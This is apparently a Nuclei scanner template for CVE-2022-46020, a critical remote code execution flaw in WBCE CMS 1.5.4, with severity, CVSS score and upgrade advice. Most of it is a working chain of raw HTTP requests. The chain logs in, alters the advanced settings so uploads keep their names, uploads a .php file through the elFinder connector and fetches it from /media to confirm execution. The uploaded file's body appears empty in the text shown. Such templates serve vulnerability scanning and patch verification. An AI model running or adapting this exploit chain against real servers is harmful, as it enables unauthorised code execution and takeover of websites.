id: CVE-2022-46020 info: name: WBCE CMS v1.5.4 - Remote Code Execution author: theamanrawat severity: critical description: | WBCE CMS v1.5.4 can implement getshell by modifying the upload file type. remediation: | Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability. reference: - https://github.com/WBCE/WBCE_CMS - https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf - https://nvd.nist.gov/vuln/detail/CVE-2022-46020 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-46020 cwe-id: CWE-434 epss-score: 0.01123 epss-percentile: 0.82955 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true max-request: 6 vendor: wbce product: wbce_cms tags: cve,cve2022,rce,wbce,cms,authenticated,intrusive http: - raw: - | GET /admin/login/index.php HTTP/1.1 Host: {{Hostname}} - | POST /admin/login/index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login - | GET /admin/settings/index.php?advanced=yes HTTP/1.1 Host: {{Hostname}} - | POST /admin/settings/save.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true§ion_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload= - | POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988 -----------------------------213974337328367932543216511988 Content-Disposition: form-data; name="reqid" test -----------------------------213974337328367932543216511988 Content-Disposition: form-data; name="cmd" upload -----------------------------213974337328367932543216511988 Content-Disposition: form-data; name="target" l1_Lw -----------------------------213974337328367932543216511988 Content-Disposition: form-data; name="upload[]"; filename="{{randstr}}.php" Content-Type: application/x-php -----------------------------213974337328367932543216511988 Content-Disposition: form-data; name="mtime[]" test -----------------------------213974337328367932543216511988-- - | GET /media/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body_6 words: - 751a8ba516522786d551075a092a7a84 - type: word part: header words: - text/html - type: status status: - 200 extractors: - type: regex name: username_fieldname group: 1 regex: - name="username_fieldname" value="(.*)" internal: true part: body - type: regex name: password_fieldname group: 1 regex: - name="password_fieldname" value="(.*)" internal: true part: body - type: regex name: formtoken group: 1 regex: - name="formtoken" value="(.*)" internal: true part: body - type: regex name: app_name group: 1 regex: - name="app_name" value="(.*)" internal: true part: body # digest: 4a0a00473045022100b9943c540bab2410e059b6047c421e50b85f4b37d8f79ee1444c0d3e6d670ef8022044d41206ee6fe15810691c5c77d42c8ddaa15cce030423cd258057a4f25c22fe:922c64590222798bb761d5b6d8e72950